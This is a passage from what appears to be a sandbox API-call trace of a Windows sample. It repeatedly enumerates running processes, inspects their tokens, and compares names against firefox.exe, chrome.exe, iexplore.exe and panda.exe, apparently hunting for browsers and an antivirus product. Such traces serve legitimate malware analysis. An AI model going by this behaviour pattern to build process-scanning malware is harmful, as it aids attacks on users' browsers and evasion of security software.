dwProcessId=0x1dc) returned 0x0 [0130.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0130.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0130.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0130.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0130.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0130.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0130.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0130.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0130.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0130.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0130.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0130.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0130.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0130.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0130.735] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0130.735] CloseHandle (hObject=0x2f0) returned 1 [0130.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0130.736] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0130.736] CloseHandle (hObject=0x2f0) returned 1 [0130.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0130.736] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0130.736] CloseHandle (hObject=0x2f0) returned 1 [0130.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0130.736] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0130.736] CloseHandle (hObject=0x2f0) returned 1 [0130.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0130.737] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0130.737] CloseHandle (hObject=0x2f0) returned 1 [0130.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0130.737] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0130.737] CloseHandle (hObject=0x2f0) returned 1 [0130.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0130.737] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0130.737] CloseHandle (hObject=0x2f0) returned 1 [0130.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0130.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0130.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0x2f0 [0130.738] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0130.738] CloseHandle (hObject=0x2f0) returned 1 [0130.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0130.738] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0130.738] CloseHandle (hObject=0x2f0) returned 1 [0130.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0130.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0130.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0130.739] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0130.739] CloseHandle (hObject=0x2f0) returned 1 [0130.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0130.739] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0130.739] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0130.739] GetLastError () returned 0x7a [0130.739] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0130.739] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0130.739] CloseHandle (hObject=0x2ec) returned 1 [0130.740] CloseHandle (hObject=0x2f0) returned 1 [0130.740] GetLengthSid (pSid=0x54010a8) returned 0x1c [0130.740] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0130.740] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0130.740] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0130.740] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0130.741] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0131.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x11440) returned 0xc0000004 [0131.744] VirtualAlloc (lpAddress=0x0, dwSize=0x12440, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0131.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x12440, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0131.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0131.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0131.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0131.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0131.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0131.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0131.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0131.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0131.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0131.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0131.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0131.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0131.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0131.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0131.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0131.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0131.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0131.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0131.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0131.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0131.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0131.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0131.751] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0131.751] CloseHandle (hObject=0x2f0) returned 1 [0131.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0131.751] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0131.751] CloseHandle (hObject=0x2f0) returned 1 [0131.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0131.752] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0131.752] CloseHandle (hObject=0x2f0) returned 1 [0131.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0131.752] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0131.752] CloseHandle (hObject=0x2f0) returned 1 [0131.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0131.752] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0131.752] CloseHandle (hObject=0x2f0) returned 1 [0131.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0131.753] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0131.753] CloseHandle (hObject=0x2f0) returned 1 [0131.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0131.753] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0131.753] CloseHandle (hObject=0x2f0) returned 1 [0131.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0131.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0131.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0x2f0 [0131.754] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0131.754] CloseHandle (hObject=0x2f0) returned 1 [0131.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0131.754] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0131.754] CloseHandle (hObject=0x2f0) returned 1 [0131.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0131.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0131.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0131.754] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0131.755] CloseHandle (hObject=0x2f0) returned 1 [0131.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0131.755] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0131.755] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0131.755] GetLastError () returned 0x7a [0131.755] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0131.755] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0131.755] CloseHandle (hObject=0x2ec) returned 1 [0131.755] CloseHandle (hObject=0x2f0) returned 1 [0131.755] GetLengthSid (pSid=0x54010a8) returned 0x1c [0131.755] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0131.755] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0131.755] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0131.755] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0131.756] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0132.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x11440) returned 0xc0000004 [0132.747] VirtualAlloc (lpAddress=0x0, dwSize=0x12440, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0132.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x12440, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0132.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0132.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0132.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0132.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0132.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0132.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0132.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0132.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0132.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0132.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0132.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0132.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0132.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0132.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0132.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0132.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0132.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0132.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0132.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0132.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0132.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0132.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0132.754] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0132.755] CloseHandle (hObject=0x2f0) returned 1 [0132.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0132.755] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0132.755] CloseHandle (hObject=0x2f0) returned 1 [0132.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0132.755] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0132.755] CloseHandle (hObject=0x2f0) returned 1 [0132.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0132.756] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0132.756] CloseHandle (hObject=0x2f0) returned 1 [0132.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0132.756] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0132.756] CloseHandle (hObject=0x2f0) returned 1 [0132.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0132.756] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0132.756] CloseHandle (hObject=0x2f0) returned 1 [0132.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0132.757] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0132.757] CloseHandle (hObject=0x2f0) returned 1 [0132.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0132.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0132.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0x2f0 [0132.757] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0132.757] CloseHandle (hObject=0x2f0) returned 1 [0132.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0132.758] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0132.758] CloseHandle (hObject=0x2f0) returned 1 [0132.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0132.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0132.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0132.758] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0132.758] CloseHandle (hObject=0x2f0) returned 1 [0132.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0132.759] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0132.759] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0132.759] GetLastError () returned 0x7a [0132.759] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0132.759] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0132.759] CloseHandle (hObject=0x2ec) returned 1 [0132.759] CloseHandle (hObject=0x2f0) returned 1 [0132.759] GetLengthSid (pSid=0x54010a8) returned 0x1c [0132.760] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0132.760] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0132.760] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0132.760] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0132.761] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0133.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0x11440) returned 0xc0000004 [0133.824] VirtualAlloc (lpAddress=0x0, dwSize=0x12440, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0133.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x12440, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0133.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0133.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0133.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0133.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0133.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0133.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0133.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0133.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0133.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0133.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0133.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0133.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0133.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0133.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0133.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0133.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0133.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0133.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0133.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0133.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0133.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0133.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0133.831] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0133.831] CloseHandle (hObject=0x2f0) returned 1 [0133.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0133.831] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0133.831] CloseHandle (hObject=0x2f0) returned 1 [0133.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0133.832] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0133.832] CloseHandle (hObject=0x2f0) returned 1 [0133.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0133.832] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0133.832] CloseHandle (hObject=0x2f0) returned 1 [0133.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0133.832] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0133.832] CloseHandle (hObject=0x2f0) returned 1 [0133.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0133.833] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0133.833] CloseHandle (hObject=0x2f0) returned 1 [0133.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0133.833] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0133.833] CloseHandle (hObject=0x2f0) returned 1 [0133.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0133.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0133.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0133.834] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0133.834] CloseHandle (hObject=0x2f0) returned 1 [0133.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0133.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0133.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0133.834] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0133.834] CloseHandle (hObject=0x2f0) returned 1 [0133.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0133.835] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0133.835] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0133.835] GetLastError () returned 0x7a [0133.835] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0133.835] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0133.835] CloseHandle (hObject=0x2ec) returned 1 [0133.835] CloseHandle (hObject=0x2f0) returned 1 [0133.835] GetLengthSid (pSid=0x54010a8) returned 0x1c [0133.836] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0133.836] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0133.836] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0133.836] lstrcmpiW 